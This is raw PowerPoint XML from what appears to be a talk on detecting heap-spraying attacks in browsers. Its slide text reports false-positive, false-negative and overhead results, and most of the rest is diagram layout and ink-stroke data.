    <dgm:cxn modelId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" srcOrd="0" destOrd="0" parTransId="{1DFA58F4-89F8-46BA-BB88-CEC3495411EA}" sibTransId="{3868F040-BEA2-4A7A-908D-8F7D3FE23CBF}"/>
    <dgm:cxn modelId="{904D2E4C-E531-4403-B48F-2641C7C6CA6E}" type="presOf" srcId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" srcOrd="0" destOrd="0" parTransId="{A44EAEB2-4EB8-4D05-B0C6-8D7BC5798E5B}" sibTransId="{4395D986-6C88-408D-BCB6-3F6BE3F6D187}"/>
    <dgm:cxn modelId="{980E564E-D23C-4723-B042-2ADCE2DCED49}" type="presOf" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{5507C57A-7F2D-45C3-8230-14B1223F3657}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{FCE838FF-FD0B-45A2-BDF5-70CC69E0107E}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{97C2C215-A715-423E-8374-04EC02A09379}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{BBB12518-29C1-41F5-8DE8-BFDB16B7C89E}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9C762BD6-F783-46CF-873F-15161699BEFD}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{01B10207-A1CE-48EA-9B48-CA29FC989295}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9AFAAE09-AC24-4054-8CD6-266FB5A3363C}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{AE9D8650-2CFC-4149-9951-49D9EA896B77}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{12523354-9216-464D-9347-424ECBBBBDF1}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{DA1312B1-E36D-4993-ACDF-2299664C6124}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{424A1B9A-E068-48A2-9FB5-97E0BA2216BF}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{966BFE71-C7D1-4B30-8FB0-1FCBBDD4EEC2}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{04805F9F-9DE8-4639-BF94-509C1521AE4A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{E6B65A15-E796-4AFF-809B-0D634D0C3A34}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{1C1DB89E-4E27-4800-897B-B3C91B2DDFAA}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2DCDD182-CB29-4DDE-A1B7-ECF9D22D74C0}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{54C60950-B23B-4769-ACE5-1F976D1AA119}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{3A8FE956-165C-4E32-A058-52AEC80A3975}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#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603E6-D1CA-4B35-B3FE-A5B5E8B64D13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4696617" y="13920"/>
          <a:ext cx="945319" cy="94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>
              <a:latin typeface="Lucida Calligraphy" pitchFamily="66" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>obj</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" i="1" kern="1200" baseline="300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sp:txBody>
      <dsp:txXfrm>
        <a:off x="4696617" y="13920"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C84910B3-A3E3-4FB6-8173-F3EA353F641F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 20572473"/>
            <a:gd name="adj4" fmla="val 18983743"/>
            <a:gd name="adj5" fmla="val 465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EFC4A4-AF3C-486B-982F-75194A1DA8A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5751094" y="1840327"/>
          <a:ext cx="945319" cy="94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B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" i="1" kern="1200" baseline="-250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i</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" i="1" kern="1200" baseline="-250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sp:txBody>
      <dsp:txXfrm>
        <a:off x="5751094" y="1840327"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5735B892-F379-43DC-B59B-A10218BC6885}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 2365799"/>
            <a:gd name="adj4" fmla="val 777069"/>
            <a:gd name="adj5" fmla="val 465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DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4696617" y="3666735"/>
          <a:ext cx="945319" cy="94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SA(B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" i="1" kern="1200" baseline="-250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i</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" i="1" kern="12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)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" i="1" kern="1200" baseline="300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sp:txBody>
      <dsp:txXfrm>
        <a:off x="4696617" y="3666735"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB7964A8-5E75-4643-8E23-B9DC31C662A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 6110409"/>
            <a:gd name="adj4" fmla="val 4439133"/>
            <a:gd name="adj5" fmla="val 465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C3D76-C097-44BD-8861-D5701E565E18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2587663" y="3666735"/>
          <a:ext cx="945319" cy="94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SA(o)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" i="1" kern="12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sp:txBody>
      <dsp:txXfrm>
        <a:off x="2587663" y="3666735"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17E22335-461B-48BA-B7B2-5C5C4823A97E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 9772473"/>
            <a:gd name="adj4" fmla="val 8183743"/>
            <a:gd name="adj5" fmla="val 465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7DD902-AE6A-4281-915A-FCF738B93D4F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1533186" y="1840327"/>
          <a:ext cx="945319" cy="94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SA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" i="1" kern="12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sp:txBody>
      <dsp:txXfrm>
        <a:off x="1533186" y="1840327"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{46E8C96F-64FA-4EBF-8D28-682A05591407}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 13165799"/>
            <a:gd name="adj4" fmla="val 11577069"/>
            <a:gd name="adj5" fmla="val 465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FE44DC-8BC8-406D-AC6C-5B9DF13F9963}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2587663" y="13920"/>
          <a:ext cx="945319" cy="94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latin typeface="Lucida Calligraphy" pitchFamily="66" charset="0"/>
              <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>NSA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" i="1" kern="1200" dirty="0">
            <a:latin typeface="Lucida Calligraphy" pitchFamily="66" charset="0"/>
            <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
            <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2587663" y="13920"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3E33E440-24ED-4D0A-B594-1FB1A79645C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 16910409"/>
            <a:gd name="adj4" fmla="val 15239133"/>
            <a:gd name="adj5" fmla="val 465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24302-0FEE-4A65-9627-5399FD6B15F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="8229599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  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> 0 False Positives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="26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10 popular AJAX-heavy sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="20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150 top Web sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1787356" y="0"/>
        <a:ext cx="6442243" cy="1414363"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="141436" y="141436"/>
          <a:ext cx="1645919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C8223-AC47-4B18-9618-E1811FA42B51}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1555799"/>
          <a:ext cx="8229599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  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> 0 False Negatives</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="26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12 published heap spraying exploits and</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="20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2,000 synthetic rogue pages generated using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1787356" y="1555799"/>
        <a:ext cx="6442243" cy="1414363"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA1312B1-E36D-4993-ACDF-2299664C6124}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="141436" y="1697236"/>
          <a:ext cx="1645919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AF71B8-0B36-4720-B756-66BDD334ECAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3111599"/>
          <a:ext cx="8229599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  <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Runtime Overhead</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="26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As high as 2x without sampling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="20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5-10% with sampling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1787356" y="3111599"/>
        <a:ext cx="6442243" cy="1414363"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{54C60950-B23B-4769-ACE5-1F976D1AA119}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="141436" y="3253035"/>
          <a:ext cx="1645919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00" units="cm"/>
          <inkml:channel name="Y" type="integer" max="1050" units="cm"/>
        </inkml:traceFormat>
        <inkml:channelProperties>
          <inkml:channelProperty channel="X" name="resolution" value="28.34008" units="1/cm"/>
          <inkml:channelProperty channel="Y" name="resolution" value="28.37838" units="1/cm"/>
        </inkml:channelProperties>
      </inkml:inkSource>
      <inkml:timestamp xml:id="ts0" timeString="2010-09-11T08:26:18.9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1AE86D0-4D28-45EB-873D-D0F76A05A9D7}" emma:medium="tactile" emma:mode="ink">
          <msink:context xmlns:msink="http://schemas.microsoft.com/ink/2010/main" type="inkDrawing" rotatedBoundingBox="1318,14103 11959,13925 11969,14564 1329,14741" semanticType="callout" shapeName="Other"/>
        </emma:interpretation>
      </emma:emma>
    </inkml:annotationXML>
    <inkml:trace contextRef="#ctx0" brushRef="#br0">51 742,'0'0,"0"0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-23-24,23 24,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,-24 0,24 0,0 0,0-24,0 24,0-23,0 23,24-24,-24 0,23 24,-23-24,0 1,24-1,0 0,0 0,-24 1,23-1,1 0,24 24,-25-24,1 1,24-1,-25 24,1-24,23 24,-23-24,24 24,-25 0,1 0,0 0,0 0,-1 0,25 24,-24-24,-1 24,1-24,0 24,0-1,-1-23,1 24,0-24,-24 0,24 24,-1-24,-23 0,24 0,0 0,-24 0,23 0,1 0,-24 0,24 0,0-24,-1 24,1 0,0-24,0 24,-1-23,25-1,-24 0,-1-23,25 23,-24 0,23 1,-23-1,23 0,-23 0,0 1,23-1,-23 24,23 0,-23-24,24 24,-1 0,-23 24,23-24,-23 0,24 24,-1-24,-23 23,23 1,1-24,-1 24,-23 0,23-1,1 1,-24-24,23 24,1-24,-25 23,25-23,-1 0,-23 0,23 0,-23 0,24-23,-1 23,-23 0,23 0,-23-24,0 24,23-24,-23 24,24 0,-1 0,-23-23,23 23,-23 0,23 0,-23 0,24 0,-25 0,25 0,-24 0,23 0,-23 0,0 23,23-23,-23 24,23-24,-23 24,0-24,23 23,-23 1,23-24,-23 24,0-24,23 0,-23-24,24 24,-25-24,25 24,-1-23,-23 23,24-24,-1 0,-23 24,23-23,1 23,-25-24,25 24,-1-24,-23 24,0 0,23-24,-23 24,24 0,-25 24,25-24,-1 0,1 24,-25-24,25 24,-1-1,-23-23,24 24,23 0,-47-1,23-23,1 24,-1 0,0-24,1 0,-1 24,1-24,-1 0,-23 0,24 0,-1-24,1 24,-1-24,0 0,1 24,-1-23,-23 23,24-24,-1 24,1 0,-25 0,25 24,-24-24,23 0,-23 23,23-23,-23 0,23 0,1 0,-1 24,-23-24,24 24,-1-24,-23 24,23-1,-23-23,24 24,-25-24,25 0,-24 0,-1 0,25 0,-25 0,1-24,0 24,23 0,-23-23,0 23,23-24,-23 24,0-24,0 0,23 1,-23 23,0-24,-1 0,25 1,-25-1,25 24,-24-24,-1 0,25 24,-1-23,-23 23,24 0,-25 0,25 0,-1 0,-23 0,24 23,-25-23,25 24,-25-24,1 0,24 24,-25-24,1 0,24 0,-25-24,1 24,0 0,0 0,-1-24,1 24,24-23,-25 23,1-24,0 24,23 0,-23-24,0 0,-1 24,25 0,-24-23,-1 23,25-24,-1 24,1 0,-1 0,1 0,-1 0,1 0,-1 24,1-24,-1 23,1 1,-1 0,1 23,-1-23,1 0,-25 23,25-23,-24 23,-1-23,1 0,23 0,-23-1,0 1,23-24,-23 0,0-24,0 24,23-23,-23-1,0 0,-1 0,25 1,-24-1,-1 0,1 1,23-1,-23 24,0-24,0 0,-1 24,1 0,0 0,0 0,-1 0,1 0,0 0,0 24,23 0,-23-24,0 24,-1-1,1-23,0 24,0 0,-1-24,1 23,0-23,-1 0,25 0,-24 0,23 0,1 0,-1-23,1 23,-1-24,1 0,23 24,-48-23,25 23,-24 0,-24 0,0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00" units="cm"/>
          <inkml:channel name="Y" type="integer" max="1050" units="cm"/>
        </inkml:traceFormat>
        <inkml:channelProperties>
          <inkml:channelProperty channel="X" name="resolution" value="28.34008" units="1/cm"/>
          <inkml:channelProperty channel="Y" name="resolution" value="28.37838" units="1/cm"/>
        </inkml:channelProperties>
      </inkml:inkSource>
      <inkml:timestamp xml:id="ts0" timeString="2010-09-11T08:26:46.222"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.08819" units="cm"/>
      <inkml:brushProperty name="height" value="0.08819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019D557-84C5-43ED-80B1-C0ED24A4AEA5}" emma:medium="tactile" emma:mode="ink">
          <msink:context xmlns:msink="http://schemas.microsoft.com/ink/2010/main" type="inkDrawing" rotatedBoundingBox="1328,14384 10818,4823 14574,8550 5084,18112" semanticType="callout" shapeName="Other"/>
        </emma:interpretation>
      </emma:emma>
    </inkml:annotationXML>
    <inkml:trace contextRef="#ctx0" brushRef="#br0">0 7678,'0'0,"0"0,24 0,-24 0,0-22,0 22,0-22,0 22,0-22,0 22,0 0,0 0,0-22,0 22,0 0,0 0,0-22,0 22,0 0,0 0,0 0,0 0,0 0,24-22,0 22,-24-22,23 22,1 0,0-22,23 22,-23-22,24 22,-25 0,1-22,23 22,1-22,-24 22,23-22,-23 22,0 0,-1 0,1 0,0 22,23-22,-23 22,0 0,-24-22,24 22,-1 0,1 0,0 0,0 0,-1 0,1-22,0 22,-1 0,1 0,0-22,0 22,-1 0,1-22,0 22,0 0,-1-22,1 22,0-22,0 22,-1-22,-23 0,24 22,0-22,-24 0,24 22,-1-22,1 0,-24 0,24 0,0 22,-1-22,1 0,0 0,-24 0,23 0,1 0,0 0,23 0,-23-22,0 22,0 0,23-22,-23 22,0-22,23 22,-23-22,23 0,-23 0,23 22,1-22,-24 0,23 0,-23 0,0 0,23 0,-23 0,0 0,23 0,-23 0,0 22,-1-22,1 22,0-22,0 22,23-22,-23 22,-1 0,1-22,0 22,23 0,-23 0,0 0,23 0,-23 0,24 0,-25 22,25-22,-24 0,23 0,-23 0,23 22,-23-22,0 0,23 22,-23-22,0 0,23 22,-23-22,0 0,23 22,-23-22,0 22,-1-22,1 22,0 0,0-22,-1 22,1 0,0-22,-1 22,1 0,24-22,-25 22,1 0,0-22,0 22,-1-22,-23 0,24 22,0 0,0-22,-1 0,-23 22,24-22,0 0,0 0,-1 0,-23 22,24-22,-24 0,24 0,0 0,-1 0,1 22,0-22,-24 0,23 0,1 0,0 0,0 22,-1-22,25 0,-24 0,-1 0,1 0,0 22,0-22,-1 0,1 0,0 0,0 0,23 22,-23-22,-1 0,1 0,24 0,-25 0,1 0,0 0,0 0,-1 0,1 0,0 0,0 0,-1 0,25 0,-24 0,-1-22,1 22,0 0,0-22,-1 22,1 0,-24-22,24 22,-1-22,1 22,-24-22,24 22,0-22,-24 0,0 22,23-22,1 22,-24-22,24 0,0 22,-24-22,23 0,1 0,-24 0,24 0,0 0,-24 0,23 22,1-22,0 22,0-22,-1 22,1-22,0 22,-1-22,1 22,0-22,-24 22,24-22,-1 22,1-22,0 22,0-22,-1 22,1 0,0 0,0 0,-1-22,1 22,0 0,-24 0,24 0,-1 0,1 0,0 0,0 0,-24 0,23 22,1-22,23 0,-47 0,48 0,-48 22,24-22,-1 0,1 0,0 22,0-22,-1 0,1 0,0 22,-24-22,24 0,-1 0,1 22,-24-22,24 0,0 22,-24-22,23 0,-23 22,24-22,0 0,-24 22,24-22,-24 0,23 22,-23-22,24 0,-24 0,24 22,-24-22,23 0,-23 22,24-22,0 22,-24-22,0 0,0 0,47 22,-47-22,0 22,0-22,24 0,-24 0,24 22,0-22,-24 0,23 22,-23-22,24 22,0-22,-24 0,24 22,-1-22,1 0,0 0,-24 0,24 22,-1-22,-23 0,24 0,-24 0,24 0,-24 0,23 0,-23 0,24 22,-24-22,0-22,0 22,24 0,-24 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 22,0-22,0 0,0 0,24 0,-24 0,23 0,-23 0,0 0,0 0,24-22,-24 22,24 0,-24 0,24-22,-24 22,23 0,-23-22,24 22,-24 0,24 0,-24-22,24 22,-1 0,-23 0,24-22,0 22,-24-22,24 22,-1-22,-23 22,24-22,0 0,0 22,-24-22,23 0,1 0,0 22,-24-22,23 0,1 22,-24-22,24 0,0 0,-24 22,23-22,-23 0,24 0,-24 22,24-22,-24 0,24 0,-24 22,0-22,23 0,-23 22,0-22,24 0,-24 0,0 22,0-22,0 0,0 0,24 0,-24 0,0 0,0 0,0 0,0 0,24-22,-24 22,0 0,0 0,0-22,23 22,-23 0,0 0,0-22,0 22,24 0,-24-22,0 22,0 0,24 0,-24 0,0-22,24 22,-24 0,0-22,23 22,-23 0,0 0,0 0,0-22,0 22,0 0,0 0,0 0,24-22,-24 22,0 0,0-22,0 22,0-22,0 22,0-22,24 22,-24-22,0 0,0 22,0-22,0 22,0-22,23 0,-23 0,0 22,0-22,24 0,-24 0,0 22,24-22,-24 0,0 0,24 0,-24 0,0 0,23 22,-23-44,0 22,24 22,-24-22,0-22,0 44,24-22,-24 0,0 22,0-22,0 22,0-22,0 0,0 22,0-22,0 22,0-22,0 0,0 0,0 22,0-22,0 0,0 22,0-22,24 0,-24 22,0-22,0 0,0 0,0 0,0 0,0 0,23-22,-23 22,0 0,0-22,0 22,24-22,-24 22,0-22,0 22,24 0,-24 0,0 0,24 0,-24 0,0 0,0 0,0 0,23 0,-23 0,0 0,0 0,0 0,24 22,-24-22,0 0,0 0,0 0,24 0,-24 0,0 0,0 0,0 0,0 0,24 0,-24 0,0 0,0 0,23 0,-23 0,0 0,0 0,24 22,-24-22,0 22,0-22,24 22,-24-22,0 22,0-22,0 0,24 0,-24 22,23-22,-23 0,0 0,24 0,-24 22,24-22,-24 0,23 0,1 22,-24-22,24 22,0-22,-24 0,23 22,-23-22,24 22,0-22,-24 22,24-22,-1 22,1-22,-24 22,24 0,0-22,-1 22,1 0,0 0,0 0,-1 0,-23 0,24 0,0 22,0-22,-1 0,-23 22,24-22,0 0,-1 22,1-22,0 0,23 0,-23 22,0-22,0 22,23-22,-23 0,23 22,-23-22,24 22,-1-22,0 22,1-22,-24 22,23-22,1 0,-1 0,24 22,-23-22,-1 0,1 22,23-22,-24 0,1 22,23-22,0 22,-23-22,23 22,-23-22,23 22,-24-22,1 22,-1-22,-23 22,0-22,-1 22,1 0,-24 0,24 0,0 0,-1 0,-23 0,0-22,0 0,-47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D0628-525F-423E-BE4C-C96693712918}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/20/2012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D1C8-AAC4-4012-9D8F-9ECA2B63A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9D1C8-AAC4-4012-9D8F-9ECA2B63A7F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Amazon:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> debugging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0F83-FF97-4F85-B35E-A1B8D40E04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97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CF11-85AB-4CFF-8EAC-FD0416555F98}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"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2C0F-448C-4512-A544-299727A3B0EE}" type="datetime1">
